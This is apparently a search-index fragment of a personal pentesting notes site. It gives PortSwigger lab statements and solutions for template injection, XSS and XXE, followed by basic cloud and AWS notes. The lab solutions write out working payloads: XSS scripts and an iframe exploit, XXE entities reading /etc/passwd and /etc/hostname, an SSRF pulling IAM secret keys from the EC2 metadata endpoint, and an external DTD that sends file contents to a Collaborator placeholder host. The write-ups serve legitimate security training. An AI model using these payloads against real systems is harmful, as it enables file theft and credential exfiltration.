        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#warning","title":"Warning","text":"

        As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit_1","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_7","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        Warning

        As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-xss/","title":"BurpSuite Labs - Cross-site Scripting","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#reflected-xss-into-html-context-with-nothing-encoded","title":"Reflected XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation","title":"Enuntiation","text":"

        This lab contains a simple\u00a0reflected cross-site scripting\u00a0vulnerability in the search functionality.

        To solve the lab, perform a cross-site scripting attack that calls the\u00a0alert\u00a0function.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution","title":"Solution","text":"

        Copy and paste the following into the search box:

        <script>alert(1)</script>\n

        Click Search.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#stored-xss-into-html-context-with-nothing-encoded","title":"Stored XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_1","title":"Enuntiation","text":"

        This lab contains a\u00a0stored cross-site scripting\u00a0vulnerability in the comment functionality.

        To solve this lab, submit a comment that calls the\u00a0alert\u00a0function when the blog post is viewed.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_1","title":"Solution","text":"

        Go to a post, and in the comment box enter:

        <script>alert(1)</script>\n

        Once you go back to the post, the script will be load.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-documentwrite-sink-using-source","title":"DOM XSS in\u00a0document.write\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_2","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search query tracking functionality. It uses the JavaScript\u00a0document.write\u00a0function, which writes data out to the page. The\u00a0document.write\u00a0function is called with data from\u00a0location.search, which you can control using the website URL.

        To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_2","title":"Solution","text":"

        Use the searchbox lo look for some alphanumeric characters and see in the response where those characters have been reflected. In this case, it was in an image:

        Now, escape those characters. For instance with:

        \"><SCRIPT>alert(1)</sCripT>\n
        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-innerhtml-sink-using-source","title":"DOM XSS in\u00a0innerHTML\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_3","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search blog functionality. It uses an\u00a0innerHTML\u00a0assignment, which changes the HTML contents of a\u00a0div\u00a0element, using data from\u00a0location.search.

        To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_3","title":"Solution","text":"

        Reviewing my notes, if we're looking for a DOM based XSS a good proof of concept would be: swisskyrepo/PayloadsAllTheThings

        An extensive XSS payload list can be used from Payloadbox but It's hard to tell which one is a positive and for this lab you will end up with a list of 124 possible payloads.

        To solve the lab, enter in the searchbox:

        #\"><img src=/ onerror=alert(2)>\n

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-anchor-href-attribute-sink-using-locationsearch-source","title":"DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_4","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the submit feedback page. It uses the jQuery library's\u00a0$\u00a0selector function to find an anchor element, and changes its\u00a0href\u00a0attribute using data from\u00a0location.search.

        To solve this lab, make the \"back\" link alert\u00a0document.cookie.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_4","title":"Solution","text":"

        In home page, pay attention to the link in \"\u00a0Submit feedback\". In home is pointing to \"/feedback?returnpath=/.

        Edit source code and add to the parameter javascript:alert(document.cookie) so that the final href attribute is:

        /feedback?returnpath=/javascript:alert(document.cookie)\n

        Click on Submit feedback.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-selector-sink-using-a-hashchange-event","title":"DOM XSS in jQuery selector sink using a hashchange event","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_5","title":"Enuntiation","text":"

        This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability on the home page. It uses jQuery's\u00a0$()\u00a0selector function to auto-scroll to a given post, whose title is passed via the\u00a0location.hash\u00a0property.

        To solve the lab, deliver an exploit to the victim that calls the\u00a0print()\u00a0function in their browser.

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_5","title":"Solution","text":"

        Copied from Burpsuite:

        1. Notice the vulnerable code on the home page using Burp or the browser's DevTools.
        2. From the lab banner, open the exploit server.
        3. In the\u00a0Body\u00a0section, add the following malicious\u00a0iframe:

          <iframe src=\"https://YOUR-LAB-ID.web-security-academy.net/#\" onload=\"this.src+='<img src=x onerror=print()>'\"></iframe> 4. Store the exploit, then click\u00a0View exploit\u00a0to confirm that the\u00a0print()\u00a0function is called. 5. Go back to the exploit server and click\u00a0Deliver to victim\u00a0to solve the lab

        ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xxe/","title":"BurpSuite Labs - XML External Entity XXE","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-using-external-entities-to-retrieve-files","title":"Exploiting XXE using external entities to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

        To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution","title":"Solution","text":"
        # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the contents of the `/etc/passwd` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-perform-ssrf-attacks","title":"Exploiting XXE to perform SSRF attacks","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_1","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

        The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

        To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_1","title":"Solution","text":"

        Capture the check stock request:

        Perfom the data exfiltration chaining xxe y ssrf. The response will display the next folder that needs to be added to the request:

        # Burpsuite solution\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the response from the metadata endpoint, which will initially be a folder name.\n4. Iteratively update the URL in the DTD to explore the API until you reach `/latest/meta-data/iam/security-credentials/admin`. This should return JSON containing the `SecretAccessKey`.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction","title":"Blind XXE with out-of-band interaction","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_2","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

        To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_2","title":"Solution","text":"
        # Burpsuite solution\n1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> ]>`\n3. Replace the `productId` number with a reference to the external entity:\n\n    `&xxe;`\n4. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction-via-xml-parameter-entities","title":"Blind XXE with out-of-band interaction via XML parameter entities","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_3","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

        To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#note","title":"Note","text":"

        To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_3","title":"Solution","text":"
        1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> %xxe; ]>`\n3. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious-external-dtd","title":"Exploiting blind XXE to exfiltrate data using a malicious external DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_4","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        To solve the lab, exfiltrate the contents of the /etc/hostname file.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_4","title":"Solution","text":"
        # Burpsuite solution\n1. Using [Burp Suite Professional](https://portswigger.net/burp/pro), go to the [Collaborator](https://portswigger.net/burp/documentation/desktop/tools/collaborator) tab.\n2. Click \"Copy to clipboard\" to copy a unique Burp Collaborator payload to your clipboard.\n3. Place the Burp Collaborator payload into a malicious DTD file:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/hostname\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>\"> %eval; %exfil;`\n4. Click \"Go to exploit server\" and save the malicious DTD file on your server. Click \"View exploit\" and take a note of the URL.\n5. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n6. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n7. Go back to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again.\n8. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the `/etc/hostname` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-retrieve-data-via-error-messages","title":"Exploiting blind XXE to retrieve data via error messages","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_5","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

        The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_5","title":"Solution","text":"
        # Burpsuite solution\n\n1. Click \"Go to exploit server\" and save the following malicious DTD file on your server:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>\"> %eval; %exfil;`\n\n    When imported, this page will read the contents of `/etc/passwd` into the `file` entity, and then try to use that entity in a file path.\n\n2. Click \"View exploit\" and take a note of the URL for your malicious DTD.\n3. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n4. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n\n    You should see an error message containing the contents of the `/etc/passwd` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xinclude-to-retrieve-files","title":"Exploiting XInclude to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_6","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that embeds the user input inside a server-side XML document that is subsequently parsed.

        Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.

        To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_6","title":"Solution","text":"
        # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Set the value of the `productId` parameter to:\n\n    `<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>`\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-via-image-file-upload","title":"Exploiting XXE via image file upload","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_7","title":"Enunciation","text":"

        This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

        To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the \"Submit solution\" button to submit the value of the server hostname.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_7","title":"Solution","text":"

        Afterwards, retrieve the avatar image:

        # Burpsuite solution\n\n- reate a local SVG image with the following content:\n\n    `<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>`\n- Post a comment on a blog post, and upload this image as an avatar.\n- When you view your comment, you should see the contents of the `/etc/hostname` file in your image. Use the \"Submit solution\" button to submit the value of the server hostname.\n

        Payload:

        <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-retrieve-data-by-repurposing-a-local-dtd","title":"Exploiting XXE to retrieve data by repurposing a local DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_8","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        To solve the lab, trigger an error message containing the contents of the /etc/passwd file.

        You'll need to reference an existing DTD file on the server and redefine an entity from it.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#hint","title":"Hint","text":"

        Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_8","title":"Solution","text":"
        # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following parameter entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> %local_dtd; ]>` This will import the Yelp DTD, then redefine the `ISOamso` entity, triggering an error message containing the contents of the `/etc/passwd` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"cloud/","title":"Pentesting cloud","text":"","tags":["cloud pentesting"]},{"location":"cloud/#basics-about-cloud","title":"Basics about cloud","text":"

        There are many \"clouds\". But these three cloud providers are the big three players in the market:

        • Azure: Fundamentals | Security Engineer Level.
        • Amazon Web Service (AWS): AWS essentials
        • Google Cloud: GCP essentials
        ","tags":["cloud pentesting"]},{"location":"cloud/#cloud-services-matrix","title":"Cloud services matrix","text":"Azure AWS GCP Available Regions Azure Regions AWS Regions and Zones Google Compute Regions & Zones Compute Services Virtual Machines Elastic Compute Cloud (EC2) Compute Engine App Hosting Azure App Service Amazon Elastic Beanstalk Google App Engine Serverless Computing Azure Functions AWS Lambda Google Cloud Functions Container Support Azure Container Service EC2 Container Service Google Computer Engine (GCE) Scaling Options Azure Autoscale Auto Scaling Autoscaler Object Storage Azure Blob Storage Amazon Simple Storage (S3) Google Cloud Storage Block Storage Azure Disks Amazon Elastic Block Store Persistent Disk Content Delivery Network (CDN) Azure CDN Amazon CloudFront Cloud CDN SQL Database Options Azure SQL Database Amazon RDS Google Cloud SQL NoSQL Database Options Azure CosmosDB AWS DynamoDB Google Cloud Bigtable Virtual Network Azure Virtual Network Amazon VPC Cloud Virtual Network Private Connectivity Azure ExpressRoute AWS Direct Connect Cloud Interconnect DNS Services Azure DNS Amazon Route S3 Cloud DNS Log Monitoring Azure Log Analytics Amazon CloudTrail Cloud Logging Performance Monitoring Azure Application Insights Amazon CloudWatch Stackdriver Monitoring Administration and Security Azure Entra ID AWS Identity and Access Management Cloud Identity and Access Management Compliance Azure Trust Center AWS CloudHSM Google Cloud Platform Security Analytics Azure Monitor Amazon Kinesis Cloud Dataflow Automation Azure Automation AWS Opsworks Compute Engine Management Management Services & Options Azure Resource Manager Amazon Cloudformation Cloud Deployment Manager Notifications Azure Notification Hub Amazon Simple Notification Service (SNS) None Load Balancing Load Balancing for Azure Elastic Load Balancing Load Balancer","tags":["cloud pentesting"]},{"location":"cloud/#pentesting-cloud_1","title":"Pentesting cloud","text":"
        • Pentesting Azure.
        • Pentesting AWS.
        • Pentesting docker.
        ","tags":["cloud pentesting"]},{"location":"cloud/apache-cloudstack/apache-cloudstack-essentials/","title":"Apache CloudStack Essentials","text":"

        Apache CloudStack is open source software designed to deploy and manage large networks of virtual machines, as a highly available, highly scalable Infrastructure as a Service (IaaS) cloud computing platform.

        Cloudstack is a turnkey solution that includes the entire stack of features most organizations want with an IIS cloud.

        We talk here about compute orchestration network as a service user and account management, a full and open native API resource accounting and a first class user interface UI. Cloudstack currently supports the most popular hypervisor, VMware KVM, Citrix, Xenserver, Xen Cloud Platform, Oracle VM Server and Microsoft Hyper-V.

        Users can manage their cloud with an easy to use web interface, command line tools and or a full featured restful API.

        In addition, Cloudstack provides an API that that is compatible with the Amazon Web service EC2 and S3.

        • For organizations that wish to deploy hybrid clouds.
        • Similar to OpenStack dashboard via the cloud stack dashboard.
        • You can manage all your resources.

        Link to installation: https://docs.cloudstack.apache.org/en/4.18.0.0/installguide/overview/index.html

        ","tags":["cloud","apache cloudstack","open source"]},{"location":"cloud/aws/aws-essentials/","title":"Amazon Web Services (AWS) Essentials","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-compute","title":"AWS Compute","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-computer-cloud-ec2","title":"Elastic Computer Cloud (EC2)","text":"

        An EC2 instance is a Virtual Server running on AWS. You deploy your EC2 instances into a virtual private cloud or VPC. You can deploy them into public or private subnets.

        You can choose: OS, CPU, RAM, Storage space, network card, firewall rules (security group), and bootstrap script (configure at fisrt launch, and which is called EC2 User Data). Concept of bootstrap: bootstrapping means launching commands when a machine starts. That script is only run once, at first start. You can: install updates, software, common files from the internet,...

        Public subnets have a public IP address and can be accessed from the Internet. Private subnets are isolated. They can only communicate with each other within the VPC (unless you install a gateway.

        Some instance types: t2.micro, t2.xlarge, c5d.4xlarge, r516xlarge, m5.8xlarge,... t2.micro is part of the AWS free tier with up to 750 hours per month. This is the name convention for instances:

        m5.2xlarge\n# m: instance class\n# 5: generation of the instance \n# 2xlarge: size within the instance class\n

        There are general purpose instances, storage optimized, network optimized, or memory optimized, for instance.

        The security groups only have allow rules (because the default is deny).By default, all inbound traffic is blocked and all outbound traffic is authorized. An instance can have multiple security groups. You can attach to your firewall rules security groups.

        Default user for connecting to EC2 via ssh is ec2-user. So ssh connection would be:

        ssh -i access-key.pem ec2-user@<IP>\n
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ami","title":"AMI","text":"

        AMI stands for Amazon Machine Image and they represent a customization of an EC2 instance. It's similar to the concept of OVA in VirtualBox.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-image-builder","title":"EC2 Image Builder","text":"

        EC2 Image Builder is used to automate the creation of VM or container images. It automates the creation, maintain, validate, and test EC2 AMIs. It can be run on a schedule. It's a free service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-storage","title":"AWS Storage","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-block-store-ebs","title":"Amazon Elastic Block Store (EBS)","text":"

        Block Storage Device, it's a virtual hard drive in the cloud. The OS reads/writes at the block level. Disks can be internal, or Network attached. The OS sees volumes that can be partitioned and formatted. Use cases:

        • Use by Amazon EC2 instances.
        • Relational and non-relational databases.
        • Enterprises applications.
        • Containerized applications.
        • Big data analytics.
        • File systems.

        The free tier has 30GB of free EBS storage of type General Purpose (SSD) or Magnetic per month.

        A definition for EBS would be that they are network drives (not physical drives). They use the network to communicate the instance. They can be detached from an EC2 instance and attached to another very quickly. They are locked to an Availability Zone.

        They don't need to be attached to any instance. They have also a delete on termination attribute. By default is not deleted. This feature can be triggered from aws-cli.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ebs-snapshots","title":"EBS Snapshots","text":"

        It makes a backup (snapshot) of your EBS volume at a point in time. Not necessary to detach volume to do snapshot, but recommended. Snapshot are useful to replicate EBS in different regions. By copying snapshot to a different region you can migrate EBS attached to another in a different region.

        There is a EBS Snapshot Archive service, that allows you to move a snapshot to an archive tier that is 75% cheaper.

        Also there is a service of a Recycle Bin, that allows you to retain snapshot. You can define the retain policy for it.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-instance-store","title":"EC2 Instance Store","text":"

        EBS volumes are network drives with good but limited performance. If you need a high-performance hardware disk, you have EC2 Instance Store.

        EC2 Instance Store is good for buffer / cache /scratch data / and temporary content, but not long term.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-file-system-efs","title":"Amazon Elastic File System (EFS)","text":"

        It uses File Storage, in which a filesystem is mounted to the OS using a network share. A filesystem can be shared by many users. Use cases:

        • Corporate home directories.
        • Corporate shared directories.
        • Big data analytics.
        • Lift & Shift enterprise applications.
        • Web serving.
        • Content management.

        EFS works only with Linux EC2 instances in multi-AZ.

        EFS Infrequent Access (EFS-IA) is a storage class cost-optimized for files that you don't access very often. It saves up to 92% of cost compared to EFS Standard. You can have EFS-IA integrated with a Lifecycle policy.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-fsx","title":"Amazon FSx","text":"

        Amazon FSx is a managed service to get third party high-performance file system on AWS.

        It's fully managed. There are 3 services:

        • FSx for Lustre: High Performance Computing. For machine learning, analytics, video processing, finantial modelling...
        • FSx for Windows File Server: support SMB and NTFS. Built on Windows File Server. Integrated with Windows Active Directory,
        • FSx for NetApp ONTAP
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-simple-storage-services-s3","title":"Amazon Simple Storage Services (S3)","text":"

        It uses Object Storage Containers. They are usually on-premises. There is no hierarchy of objects in the container. It's used for backup and storage, along with disaster recovery, archive, media hosting, hybrid cloud storage... It uses REST API. Use cases:

        • Websites.
        • Mobile applications.
        • Backup and archiving.
        • IoT devices.
        • Big data analytics.

        As benefits, it has very low-cost object storage, a high durability and multiple storage classes.

        In S3 you have buckets. A bucket is a container into which you put your objects. You can have those objects inside your bucket public or private to the Internet. Buckets must have an unique name. They are define at the region level.

        A key is the full path to the file: s3://my-bucket/my-folder/my-file.txt It's composed by a prefix and an object name. Max object size is 5TB (5000 GB).

        There are S3 Buckets Policies to allow public access. There are also IAM permissions that you can assign to users. You can also have EC Instance Role to grant access to EC2 instances. Additionally, in the Bucket settings you can block public access (this can be also set at an account level).

        Cool tool: Amazon policy generator

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#creating-a-static-website","title":"Creating a static website","text":"

        This would be the url: http://bucketname.s3-website-aws-region.amazonaws.com

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#storage-classes","title":"Storage classes","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-network","title":"Amazon Network","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-load-balancing-elb","title":"Amazon Elastic Load Balancing (ELB)","text":"

        A load balancer is a server that will forward the internet traffic down to multiple servers downstream. And for then there will be EC2 instances. They're also called the backend EC2 instances.

        Elastic load balancing is something that is managed by AWS.

        Benefits:

        • ELB can spread the load across multiple downstream instances.
        • ELB allows you to expose a single point of access, DNS host name, for your application.
        • ELB can seamlessly handle the failures of downstream instances.
        • EBL can do regular health checks on them and if one of them is failing, then the load balancer will not direct traffic to that instance.
        • It provides SSL termination (HTPPS) for your websites.

        There are 4 kinds: - Application Load Balancer (HTTP/HTTPs only) - Layer 7 - Network Load Balancer (ultra high performance, allows for TCP) - Layer 4 - Gateway Load Balancer - Layer 3. - Classic Load Balancer (retired in 2023) - Layer 4 and 7.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#auto-scaling-groups-asg","title":"Auto Scaling Groups (ASG)","text":"

